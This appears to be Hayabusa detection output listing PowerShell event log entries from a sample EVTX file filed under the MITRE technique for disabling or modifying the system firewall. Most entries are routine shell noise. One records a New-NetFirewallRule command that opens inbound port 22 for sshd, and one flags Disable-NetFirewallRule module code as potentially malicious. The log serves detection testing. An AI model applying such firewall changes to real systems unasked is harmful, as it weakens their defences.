+2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.763 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.763 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.764 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.768 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.768 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.771 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.771 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.783 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.788 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.792 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.793 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.795 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.796 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.944 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.944 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.947 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.947 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.949 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.950 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.954 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.954 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.957 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.959 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.976 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.980 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.985 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.994 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.998 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:29.999 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:30.001 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:30.043 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:30.044 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:30.046 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:43.608 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:43.609 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.641 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
